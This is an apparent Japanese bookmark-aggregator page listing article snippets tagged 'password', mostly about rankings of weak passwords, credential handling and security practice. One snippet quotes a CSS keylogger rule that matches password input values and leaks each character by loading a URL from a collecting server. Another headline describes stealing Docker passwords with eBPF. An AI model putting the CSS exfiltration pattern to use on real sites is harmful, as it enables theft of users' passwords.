タグ password
人気順 10 users 50 users 100 users 500 users 1000 usersTerraform で AWS に DB を構築するとき manage_master_user_password を使っていますか? - ISID テックブログ
こんにちは。X(クロス)イノベーション本部 ソフトウェアデザインセンター セキュリティグループの耿です。 Terraform で Amazon RDS インスタンス/クラスターを作る時に、password または master_password 属性に指定したマスターユーザーのパスワードが tfstate ファイルに平文で残ってしまう問題がありました。 (参... 続きを読む
The beginning of the end of the password
2022年、日本で最も使われたパスワード 2位は「password」、1位は?
2022年に最も使われたパスワードは?──セキュリティ企業が調査結果を発表した。日本の2位は「password」。1位は? パナマのセキュリティ企業であるNord Securityは11月15日(日本時間)、2022年に最も使われたパスワードのランキングを発表した。米国やオーストラリアなど世界30カ国の1位は「password」(使用回数約500... 続きを読む
21年に漏えいした日本のパスワード、2位は「password」 1位は? ソリトンシステムズ調査
ソリトンシステムズが日本人が利用するパスワードランキングを発表した。2021年に発見された情報漏えい事件から分析したところ、1位は「123456」だった。 ソリトンシステムズは2月7日、「日本人のパスワードランキング2021」を発表した。2021年に発見された209の情報漏えい事件から日本人が利用するパスワードを同社が分... 続きを読む
eBPFでDockerの--passwordで入力したパスワードを盗む | κeenのHappy Hacκing Blog
κeenです。以前の記事の続きで、 /proc を監視するのではなくeBPFで取得してみます。ついでにRustのコードをeBPFで動かせるライブラリのayaも使ってみます。 以前の記事では /proc 以下の監視をビジーループで回すという力技で新しく作られたプロセスを補足していました。これだとCPU使用率が上がって美しくありませんし... 続きを読む
世界中に影響も? 英政府が「password」など安易なデフォルトパスワードに罰金を課す法案【やじうまWatch】
「password」や「admin」など安易なパスワードをデフォルトに設定することを禁じる法案をイギリス政府が提出
イギリス政府が、スマートホーム機器のセキュリティ向上を目的とした「製品セキュリティおよび電気通信インフラストラクチャ(PSTI)法案」を議会に提出したと発表しました。この法案ではスマートフォンやテレビ、スマートスピーカーなどのデジタルデバイスのデフォルトパスワードに「password」「admin」などの推測しやす... 続きを読む
2021 年版流出パスワードトップ 200、 世界では「123456」が 1 位、日本では「password」が 1 位 | スラド セキュリティ
パスワードマネージャーの NordPass が 2021 年版の人気パスワードトップ 200 を公開している (NordPass の記事、 HackRead の記事、 Mashable の記事)。 調査は NordPass がサイバーセキュリティインシデント専門の独立系研究者と協力してまとめたもので、4 TB のデータベースを調査したという。1 位は各社の調査で 10 ... 続きを読む
2021年に最も使われたパスワード、世界1位は「123456」 日本の1位は?――Nord Security調べ
パスワード管理ツール「NordPass」を提供するパナマのセキュリティ企業であるNord Securityは11月17日、2021年で最も使われたパスワードのランキングを発表した。その結果、世界50カ国での1位は「123456」であり、日本での1位は「password」であることが分かった。 同社では世界50カ国で使われたパスワードを集計し、全... 続きを読む
プログラミングする時に英語が得意な人と苦手な人の間にはこんな差がある「英語圏の人はデフォルトでこれなのでズルい」 - Togetter
せせり(大岡まひろ)@個人開発 @sesere115 has_many :posts は user has many posts.に has_one :user_profile は user has one user profile.に validates :password, uniquness: true は user validates password uniqueness? → true になる(文法的におかしいけど分かる) 苦手な人も英語っぽく読む意識つけると読み... 続きを読む
「Pマーク取得に必要だから」は都市伝説? “PPAP”をめぐる謎を、名付け親に聞いた (1/3) - ITmedia ビジネスオンライン
SIerの営業現場で数多くの会社と商取引をする中で、紙にハンコの山と格闘。また、PPAP(Passwordつきzip暗号化ファイルを送ります/Passwordを送ります/An号化/Protocol)、PHS(Printしてから/Hanko押して/Scanして送ってくださいプロトコル)、ネ申エクセルといった形式的な電子化に痛めつけられる。これらの不合... 続きを読む
[ちょっと一息] pdfのpasswordが分からない! | 奴隷インフラエンジニアの日常
こんにちは。 梶松です。 今回はちょっと一息という事で、 この間遭遇した出来事で役に立ったものを紹介します。 仕事をしていく中で多くのpdfファイルに触れる事があると思います。 しかし、仕事で触るpdfというのは社内秘だったり社外秘という事で パスワードがかかってる事があると思います。 でも、みなさん。。。 p... 続きを読む
間違えてGitHubなどにSECRET_KEYをpushしてしまった時の対処法(個人のみ) - Qiita
備忘録です やらかした!! GitHubなどで、TwitterのpasswordやAWSなどのSECRET_KEYが含まれたプロジェクトを管理する際、.gitignoreをちゃんと指定してやらないとgitのcommit履歴などにそのSECRET_KEYなどの値が残ってしまいます。 こういったミスでSECRET_KEYなどが流出するとセキュリティインシデントに繋がりますね... 続きを読む
Find And Update Access Keys, Password, And MFA Settings Easily Using The AWS Management Console
Now, AWS Identity and Access Management (IAM) makes it easier for IAM users to view, update and understand all their security credentials from one place using the My Security Credentials page in the AWS Management Console. The My Security Credentials page is updated to help guide developers to di... 続きを読む
ログインにはなぜ username と password が必要なのか?〜 簡単ログインを目指して | DevelopersIO
永遠の生魚おじさん、都元です。最近カメラ沼にはまりました。レンズ沼というよりアクセサリ沼にはまりそうです。ピークデザインかっこいい。 さて、弊社は本日を最終営業日として、これから冬季休業となります。 今年も一年、どうもありがとうございました。というわけで書き納め三本締めの二本目。 ログインに必要なも... 続きを読む
「最悪なパスワード」2018年版ランキング発表 トップ2は6年連続で「123456」「password」 「donald」も人気 - ねとらぼ
パスワード管理サービスを提供する米SplashDataが12月13日(現地時間)、インターネットで漏えいしたパスワードの中でも多用されている「最悪なパスワード」の2018年版ランキングを発表しました。1位は「123456」、2位は「password」と、上位2つは6年連続同じ結果となりました。 なぜ皆使い続けるのか…… ランキングは同... 続きを読む
CSSだけでキーロガーを作る - R42日記
2018 - 02 - 21 CSSだけでキーロガーを作る https://github.com/maxchehab/CSS-Keylogging よくもまあこんなこと思いついたなw 要するに、 input [ type = "password" ][ value $= "a" ] { background-image : url( "http://localhost:3000/a" ) ; } ... 続きを読む
サイバーセキュリティが「常識」となるために必要なこと - CNET Japan
道路を渡るときは左右をよく確認する。トイレから出る前に手を洗う。車に乗るときはシートベルトを着用する。黄色い雪を食べてはいけない。 これらはすべて安全に関する常識的な習わしであり、誰もが両親から(あるいは雪の日の経験から)、既に学んでいるはずだ。だが、サイバーセキュリティに関して言えば、常識はほとんど存在しない。 「password」が良いパスワード候補だと考える人は、依然として大勢いる。Keep... 続きを読む
「最悪なパスワード」2015年版ランキングが発表 1位は「123456」 (ねとらぼ) - Yahoo!ニュース
パスワード管理サービスを提供する米SplashDataが1月19日、インターネットで多用されている「最悪なパスワード」2015年版ランキングを発表しました。 【米SplashDataのパスワード管理術】 1位は「123456」で、2位は「password」。この2つは同社がランキング発表を開始した2011年からずっと上位にいるそうで「人々がいかに危険なパスワードを選び続けているかを示している」と... 続きを読む
最もよく使われている危険なパスワードトップ25リスト、年度ごとにパスワードにも流行があることも明らかに - GIGAZINE
パスワード管理アプリの「 SplashData 」が、インターネットユーザーが使用しているパスワードの内、「 2015年に最もよく使用されたパスワードトップ25 」を発表しました。 過去に発表されたリスト 同様、「123456」や「password」といった簡単なパスワードが上位に並ぶ中、2015年ならではなパスワードも登場しています。 Announcing Our Worst Passwords... 続きを読む
安易なパスワードの2015年版ランキング、上位は? - ITmedia エンタープライズ
「1234567890」など数字の羅列を長くしただけのパスワードは、「セキュリティ対策としては無意味」だとSplashDataは指摘する。 インターネットで最も多用されている安易なパスワードの筆頭は「123456」と「password」――。パスワード管理アプリを提供する米SplashDataが1月19日、「最悪のパスワード」の2015年版ランキングを発表した。 「123456」と「passwor... 続きを読む
パスワード用途以外にinput要素のtype="password"を使うのは間違っていない | 富永日記帳
パスワード用途以外にinput要素のtype="password"を使うのはどうやら間違っている - F.Ko-Jiの「一秒後は未来」(blog.fkoji.com)に対する返信記事です。当該記事では Chrome の挙動をもとにセキュリティコードの入力欄に type="password" を使うというのが意味的にも間違っていると Chrome は言いたいのだなと解釈しました。と締めていますが、 ... 続きを読む
強力なパスワードの作成は本当に意味があるか - 世界のセキュリティ・ラボから:ITpro Active
世界のセキュリティベンダーのブログから、興味深い話題をピックアップして紹介する。今回は、まず、パスワードに関するブログから。英ソフォスのブログで、これまでの常識を覆す内容が興味深い。 セキュリティ保護には長くて複雑なパスワードを選ぶことが重要だということは誰もが認める常識である。しかし相変わらず「12345」や「password」など、瞬時に破られてしまうパスワードを使っている人が多い。このため、... 続きを読む
ソニー流出データが追加公開、管理の甘さが浮き彫りに : ギズモード・ジャパン
セキュリティ , ソニー , 企業 ソニー流出データが追加公開、管理の甘さが浮き彫りに 2014.12.06 18:00 フォルダ名、ファイル名、パスワード、どれもわかりやすすぎました’。 ソニー・ピクチャーズがハッキングされて流出した大量の文書は今、犯人たちの手で徐々に公開されています。その規模はファイルサイズで100TBと史上最悪とも言われますが、大量のパスワードリストが「Password」っ... 続きを読む
世界のセキュリティ・ラボから - 強力なパスワードの作成は本当に意味があるか:ITpro
世界のセキュリティベンダーのブログから、興味深い話題をピックアップして紹介する。今回は、まず、パスワードに関するブログから。英ソフォスのブログで、これまでの常識を覆す内容が興味深い。 セキュリティ保護には長くて複雑なパスワードを選ぶことが重要だということは誰もが認める常識である。しかし相変わらず「12345」や「password」など、瞬時に破られてしまうパスワードを使っている人が多い。このため、... 続きを読む